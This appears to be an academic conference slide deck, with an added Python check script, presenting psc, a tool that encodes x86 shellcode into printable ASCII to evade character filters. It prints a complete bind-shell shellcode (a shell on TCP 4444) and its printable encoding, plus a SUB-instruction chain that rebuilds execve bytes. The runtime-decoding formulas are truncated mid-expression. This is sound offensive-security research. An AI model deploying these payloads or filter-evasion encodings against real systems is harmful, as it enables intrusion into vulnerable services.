Automatic Generation of Compact Printable Shellcodes For x86 (WOOT '20)
Dhrumil Patel, Aditya Basu, Anish Mathuria
August 11, 2020
Outline
- Introduction
- Currently Used Algorithms
- Motivation
- Printable Shellcode Compiler (psc)
- Results
- Conclusion
Printable Shellcodes
- Defensive filters strip all non-printable characters from input. This ruins most injection attacks.
- Attacker's goal is to generate code that consists only of the printable ASCII characters (0x21-0x7E):
  0123456789
  ABCDEFGHIJKLMNOPQRSTUVWXYZ
  abcdefghijklmnopqrstuvwxyz
  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
Currently Used Algorithms

Riley Eller Algorithm
"Any dword (4 bytes) can be derived from two or three SUB instructions whose operands are printable bytes"
- Available as a Metasploit plugin
- Example: deriving the bytes 0x89e3cd80 of the execve /bin/sh shellcode

  # Constants are printable (0x21-0x7E); the chain starts from %eax = 0
  sub $0x256d6d2d, %eax
  sub $0x256d6d25, %eax
  sub $0x34574225, %eax
  push %eax

- Each byte is encoded with > 2.5 bytes
Source to Source Conversion
- Geczi and Ivanyi replace all non-printable instructions with a sequence of printable instruction(s)
- 38 byte shellcode → 9837 bytes printable shellcode
- Not publicly available
We Need Compact Shellcodes
- Transforming to printable ⇒ increases shellcode size
- Size restrictions on input
- Example: Buffer overflow exploits are limited by the buffer size.
Printable Shellcode Compiler
(Overview, Encoding Scheme, Runtime Decoder, Testing)

psc: Printable Shellcode Compiler
- Arbitrary shellcode → Printable shellcode
- Special encoding scheme
- Hand-crafted decoder that is printable
[Figure: layout of the psc output. The printable shellcode is a printable Decoder (size = 146 bytes) followed by the encoded payload (the encoded shellcode); the Decoder itself consists of a custom XOR patcher followed by the decoder loop (size = 73 bytes).]
psc Encoding Scheme
[Figure: bit layout of the encoding. Each pair of original bytes (Original Byte #1 = bits b0..b7, Original Byte #2 = bits b8..b15) becomes three encoded bytes:
  Encoded B1 = 0x3F + (4-bit value built from b0..b3)
  Encoded B2 = 0x3F + (6-bit value built from b4..b9)
  Encoded B3 = 0x3F + (6-bit value built from b10..b15)
  Encoded Range = 0x3F - 0x7E
  Range of Encoded Bytes: (0x3F, 0x7E)]
psc Runtime Decoding
- ECX: Read Pointer, EDX: Write Pointer
- Initializer: B1 = 0x26
- Recover first byte, R1 ← (B1 > 2
- Recover second byte, R2 ← (B2
Testing
[Figure: the same layout (custom XOR patcher, decoder loop of size 73 bytes, encoded payload / encoded shellcode, Decoder), with a SIGTERM raised for testing.]
- Signal handler checks Recovered Shellcode == Original Shellcode
psc In Action
Shellcode to spawn shell on 4444/TCP (binary):
\x31\xc0\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x97\x31\xc0\x43\x50\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb0\x66\xcd\x80\x50\x57\x89\xe1\xb0\x66\x83\xc3\x02\xcd\x80\x50\x50\x57\x89\xe1\x04\x66\x43\xcd\x80\x93\x31\xc0\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x66\x68\x73\x68\x68\x2f\x2f\x62\x61\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
Converted from binary to printable:
`PYj0X40HP[j0X0Y50AO0YO0Y`0Aa0Ya0Ab0Yi0Aj0Yj0Ak0Ym0YnrII0Y70A80Y80A90Y=0Y>0YGQZOyI&t
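As an added example (not code from the paper or from the psc tool), the following Python models the printable-only input filter described in the Printable Shellcodes slide, checks the two payloads from the psc In Action slide against it, and emulates the Riley Eller SUB chain from the earlier slide to confirm that it reconstructs the bytes 0x89e3cd80. It goes one step beyond the slides by computing the Eller expansion ratio for 2 and 3 SUBs. The shellcode prefix and the psc output are transcribed from the slide (the psc output's leading quote read as a backtick, 0x60), and %eax is assumed to be zero before the chain runs.

```python
import struct

# Printable range used by the filter and both encoders on the slides: 0x21-0x7E
PRINTABLE = range(0x21, 0x7F)


def passes_printable_filter(data: bytes) -> bool:
    """True if a printable-only filter would pass the input through unchanged."""
    return all(b in PRINTABLE for b in data)


def nonprintable_positions(data: bytes) -> list:
    """Offsets of the bytes such a filter would strip (why raw shellcode breaks)."""
    return [i for i, b in enumerate(data) if b not in PRINTABLE]


def sub_chain_pushes(constants, eax=0) -> bytes:
    """Emulate `sub $imm32, %eax` for each constant, then `push %eax`.

    Returns the 4 bytes that land on the stack (little-endian), i.e. the
    instruction bytes the chain reconstructs. Assumes %eax starts at 0.
    """
    for imm in constants:
        eax = (eax - imm) & 0xFFFFFFFF
    return struct.pack("<I", eax)


def chain_is_printable(constants) -> bool:
    """The chain itself: opcode 0x2D ('-') + imm32 per SUB, then 0x50 ('P') for push."""
    encoded = b"".join(b"\x2d" + struct.pack("<I", c) for c in constants) + b"\x50"
    return passes_printable_filter(encoded)


def eller_bytes_per_payload_byte(n_subs: int) -> float:
    """Expansion of the Eller scheme: n SUBs (5 bytes each) + 1 push per 4 payload bytes."""
    return (5 * n_subs + 1) / 4


# Slide example: the three SUB immediates that yield 89 e3 cd 80 (mov %esp,%ebx ; int $0x80)
ELLER_CONSTANTS = [0x256D6D2D, 0x256D6D25, 0x34574225]

# First 16 bytes of the bind-shell shellcode from the "psc In Action" slide
RAW_SHELLCODE_PREFIX = bytes.fromhex("31c031db5343536a0289e1b066cd8097")

# psc output shown on the same slide (leading quote transcribed as a backtick)
PSC_OUTPUT = b"`PYj0X40HP[j0X0Y50AO0YO0Y`0Aa0Ya0Ab0Yi0Aj0Yj0Ak0Ym0YnrII0Y70A80Y80A90Y=0Y>0YGQZOyI&t"

if __name__ == "__main__":
    print("raw prefix stripped at offsets:", nonprintable_positions(RAW_SHELLCODE_PREFIX))
    print("psc output passes filter:", passes_printable_filter(PSC_OUTPUT))
    print("Eller chain pushes:", sub_chain_pushes(ELLER_CONSTANTS).hex(),
          "chain printable:", chain_is_printable(ELLER_CONSTANTS))
    print("Eller bytes per payload byte (2 / 3 SUBs):",
          eller_bytes_per_payload_byte(2), eller_bytes_per_payload_byte(3))
```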
Results
(Encoding Performance, Total Output Size)

Results: Only Encoded Shellcode
[Bar chart "Encoding Performance": encoded size in bytes (axis 0-2000) of the Original, Riley Eller and psc versions of seven shellcodes: execve /bin/sh, add root user, copy /etc/passwd, shell on 4444/TCP, download file & execute, HTTP Server on 8800/TCP, shell on 8080/TCP over SSL.]
- psc encoding is more compact than the Riley Eller algorithm
Results: Decoder & Encoded Shellcode
[Bar chart "Total Output Size": decoder plus encoded shellcode in bytes (axis 0-2000) for the same seven shellcodes (execve /bin/sh, add root user, copy /etc/passwd, shell on 4444/TCP, download file & execute, HTTP Server on 8800/TCP, shell on 8080/TCP over SSL), comparing Original, Riley Eller and psc.]
- For large shellcodes, psc beats the Riley Eller algorithm
psc vs ALPHA3
- psc encoding outperforms ALPHA3: ALPHA3 changes 1 byte → 2 bytes, psc changes 1 byte → 1.5 bytes
- However, the compact encoding makes our decoder complicated.
- psc beats ALPHA3 for larger shellcodes (size > 236 bytes).
Concluding Remarks
- We present a new encoding algorithm that uses looped decoding to reduce the size of the auto-generated printable shellcodes.
- We produce about 40%-50% smaller printable shellcodes as compared to the Riley Eller algorithm.
- Future Plan: Add support for x86_64 shellcodes
References
- Riley Eller. Bypassing MSB Data Filters for Buffer Overflow Exploits on Intel Platforms. http://julianor.tripod.com/bc/bypass-msb.txt
- Zsolt Géczi and Peter Iványi (2018). Automatic translation of assembly shellcodes to printable byte codes. Pollack Periodica 13(04), 3-20.
- B.J. Wever. ALPHA3. https://github.com/SkyLined/alpha3
Thanks!
Dhrumil Patel, DevOps at Acko Technology and Services Private Limited
Aditya Basu, PhD Student at Penn State
Anish Mathuria, Professor